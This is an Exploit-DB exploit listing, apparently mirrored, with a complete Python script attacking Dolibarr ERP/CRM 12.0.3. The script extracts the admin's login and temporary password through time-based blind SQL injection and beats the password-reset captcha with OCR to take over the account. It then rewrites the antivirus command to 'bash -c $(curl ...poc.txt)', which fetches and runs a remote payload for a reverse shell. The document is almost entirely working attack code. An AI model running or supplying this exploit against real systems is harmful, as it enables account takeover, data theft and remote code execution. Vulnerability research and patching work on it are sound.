Dolibarr 12.0.3 – SQLi to RCE

  • 作者: coiffeur
    日期: 2020-12-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49240/
  • # Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
    # Date: 2/12/2020
    # Exploit Author: coiffeur
    # Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
    # Vendor Homepage: https://www.dolibarr.org/
    # Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
    # Version: 12.0.3
    
    import argparse
    import binascii
    import random
    import re
    from io import BytesIO
    from urllib.parse import quote_plus as qp
    
    import bcrypt
    import pytesseract
    import requests
    from bs4 import BeautifulSoup
    from PIL import Image
    
    DELTA = None
    DEBUG = 1
    SESSION = requests.session()
    TRESHOLD = 0.80
    DELAY = 1
    LIKE = "%_subscription"
    COLUMNS = ["login", "pass_temp"]
    
    
    def usage():
    banner = """NAME: Dolibarr SQLi to RCE (authenticate)
    SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS=
    SWORD>
    EXAMPLE:
    python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12=
    .0.3/htdocs/" -u test -p test
    AUTHOR: coiffeur
    """
    print(banner)
    exit(-1)
    
    
    def hex(text):
    return "0x" + binascii.hexlify(text.encode()).decode()
    
    
    def hash(password):
    salt = bcrypt.gensalt()
    hashed = bcrypt.hashpw(password.encode(), salt)
    return hashed.decode()
    
    
    def authenticate(url, username, password):
    datas = {
    "actionlogin": "login",
    "loginfunction": "loginfunction",
    "username": username,
    "password": password
    }
    r = SESSION.post(f"{url}index.php", data=datas,
     allow_redirects=False, verify=False)
    if r.status_code != 302:
    if DEBUG:
    print(f"[x] Authentication failed!")
    return 0
    if DEBUG:
    print(f"[*] Authenticated as: {username}")
    return 1
    
    
    def get_antispam_code(base_url):
    code = ""
    while len(code) != 5:
    r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
    temp_image = f"/tmp/{random.randint(0000,9999)}"
    with open(temp_image, "wb") as f:
    f.write(r.content)
    with open(temp_image, "rb") as f:
    code = pytesseract.image_to_string(
    Image.open(BytesIO(f.read()))).split("\n")[0]
    for char in code:
    if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
    code = ""
    break
    return code
    
    
    def reset_password(url, login):
    for _ in range(5):
    code = get_antispam_code(url)
    headers = {
    "Referer": f"{url}user/passwordforgotten.php"
    }
    datas = {
    "action": "buildnewpassword",
    "username": login,
    "code": code
    }
    r = SESSION.post(url=f"{url}user/passwordforgotten.php",
     data=datas, headers=headers, verify=False)
    if r.status_code == 200:
    for response in [f"Request to change password for {login} sent =
    to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]:
    if r.text.find(response):
    if DEBUG:
    print(f"[*] Password reset using code: {code}")
    return 1
    return 0
    
    
    def change_password(url, login, pass_temp):
    r = requests.get(url=f"{url}user/passwordforgotten.php?action=val=
    idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
     allow_redirects=False, verify=False)
    if r.status_code == 302:
    if DEBUG:
    print(f"[*] Password changed: {pass_temp}")
    return 1
    return 0
    
    
    def change_binary(url, command, parameters):
    headers = {
    "Referer": f"{url}admin/security_file.php"
    }
    datas = {
    "action": "updateform",
    "MAIN_UPLOAD_DOC": "2048",
    "MAIN_UMASK": "0664",
    "MAIN_ANTIVIRUS_COMMAND": command,
    "MAIN_ANTIVIRUS_PARAM": parameters
    }
    r = SESSION.post(url=f"{url}admin/security_file.php",
     data=datas, headers=headers, verify=False)
    if r.status_code == 200:
    for response in ["Record modified successfully", "Enregistrement mo=
    difi=C3=A9 avec succ=C3=A8s"]:
    if response in r.text:
    if DEBUG:
    print(f"[*] Binary's path changed")
    return 1
    return 0
    
    
    def trigger_exploit(url):
    headers = {
    "Referer": f"{url}admin/security_file.php"
    }
    files = {
    "userfile[]": open("junk.txt", "rb"),
    }
    datas = {
    "sendit": "Upload"
    }
    if DEBUG:
    print(f"[*] Triggering reverse shell")
    r = SESSION.post(url=f"{url}admin/security_file.php",
     files=files, data=datas, headers=headers, verify=False)
    if r.status_code == 200:
    for response in ["File(s) uploaded successfully", "The antivirus pr=
    ogram was not able to validate the file (file might be infected by a virus)=
    ", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus=
     n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir=
    us) !"]:
    if response in r.text:
    if DEBUG:
    print(f"[*] Exploit done")
    return 1
    return 0
    
    
    def get_version(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(
    r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
    if x:
    version = x[0]
    if "12.0.3" in version:
    if DEBUG:
    print(f"[*] {version} (exploit should work)")
    return 1
    if DEBUG:
    print(f"[*] Version may not be vulnerable")
    return 0
    
    
    def get_privileges(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(r"id=\d", r.text)
    if x:
    id = x[0]
    if DEBUG:
    print(f"[*] id found: {id}")
    r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    for img in soup.find_all("img"):
    if img.get("title") in ["Actif", "Active"]:
    for td in img.parent.parent.find_all("td"):
    privileges = [
    "Consulter les commandes clients", "Read customers =
    orders"]
    for privilege in privileges:
    if privilege in td:
    if DEBUG:
    print(
    f"[*] Check privileges: {privilege}=
    ")
    return 1
    if DEBUG:
    print(f"[*] At the sight of the privileges, the exploit may fail")
    return 0
    
    
    def check(url, payload):
    headers = {
    "Referer": f"{url}commande/stats/index.php?leftmenu=orders"
    }
    datas = {"object_status": payload}
    r = SESSION.post(url=f"{url}commande/stats/index.php",
     data=datas, headers=headers, verify=False)
    return r.elapsed.total_seconds()
    
    
    def evaluate_delay(url):
    global DELTA
    deltas = []
    payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    for _ in range(4):
    deltas.append(check(url, payload))
    DELTA = sum(deltas)/len(deltas)
    if DEBUG:
    print(f"[+] Delta: {DELTA}")
    
    
    def get_tbl_name_len(url):
    i = 0
    while 1:
    payload = f"IF((SELECT LENGTH(table_name) FROM information_schema=
    .tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
    if check(url, payload) >= DELTA*TRESHOLD:
    return i
    if i > 100:
    print(f"[x] Exploit failed")
    exit(-1)
    i += 1
    
    
    def get_tbl_name(url, length):
    tbl_name = ""
    for i in range(1, length+1):
    min, max = 0, 127-1
    while min < max:
    mid = (max + min) // 2
    payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i=
    nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP=
    ({DELAY}), SLEEP(0))"
    if check(url, payload) >= DELTA*TRESHOLD:
    max = mid
    else:
    min = mid + 1
    tbl_name += chr(min)
    return tbl_name
    
    
    def get_elt_len(url, tbl_name, column_name):
    i = 0
    while 1:
    payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI=
    T 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
    if check(url, payload) >= DELTA*TRESHOLD:
    return i
    if i > 100:
    print(f"[x] Exploit failed")
    exit(-1)
    i += 1
    
    
    def get_elt(url, tbl_name, column_name, length):
    elt = ""
    for i in range(1, length+1):
    min, max = 0, 127-1
    while min < max:
    mid = (max + min) // 2
    payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO=
    M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
    if check(url, payload) >= DELTA*TRESHOLD:
    max = mid
    else:
    min = mid + 1
    elt += chr(min)
    return elt
    
    
    def get_row(url, tbl_name):
    print(f"[*] Dump admin's infos from {tbl_name}")
    infos = {}
    for column_name in COLUMNS:
    elt_length = get_elt_len(url, tbl_name, column_name)
    infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng=
    th)
    if DEBUG:
    print(f"[+] Infos: {infos}")
    return infos
    
    
    def main(url, username, password):
    # Check if exploit is possible
    print(f"[*] Requirements:")
    if not authenticate(url, username, password):
    print(f"[x] Exploit failed!")
    exit(-1)
    get_version(url)
    get_privileges(url)
    
    print(f"\n[*] Starting exploit:")
    # Evaluate delay
    evaluate_delay(url)
    print(f"[*] Extract prefix (using table: {LIKE})")
    tbl_name_len = get_tbl_name_len(url)
    tbl_name = get_tbl_name(url, tbl_name_len)
    prefix = f"{tbl_name.split('_')[0]}_"
    if DEBUG:
    print(f"[+] Prefix: {prefix}")
    
    # Dump admin's infos
    user_table_name = f"{prefix}user"
    infos = get_row(url, user_table_name)
    if not infos["login"]:
    print(f"[x] Exploit failed!")
    exit(-1)
    
    # Reset admin's passworrd
    if DEBUG:
    print(f"[*] Reseting {infos['login']}'s password")
    if not reset_password(url, infos["login"]):
    print(f"[x] Exploit failed!")
    exit(-1)
    infos = get_row(url, user_table_name)
    
    # Remove cookies to logout
    # Change admin's password
    # Login as admin
    SESSION.cookies.clear()
    if not change_password(url, infos['login'], infos['pass_temp']):
    print(f"[x] Exploit failed!")
    exit(-1)
    authenticate(url, infos['login'], infos['pass_temp'])
    
    # Change antivirus's binary path
    # Trigger reverse shell
    change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'=
    )
    trigger_exploit(url)
    return 0
    
    
    if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", help="Base URL of Dolibarr")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()
    
    if not args.t or not args.u or not args.p:
    usage()
    
    main(args.t, args.u, args.p)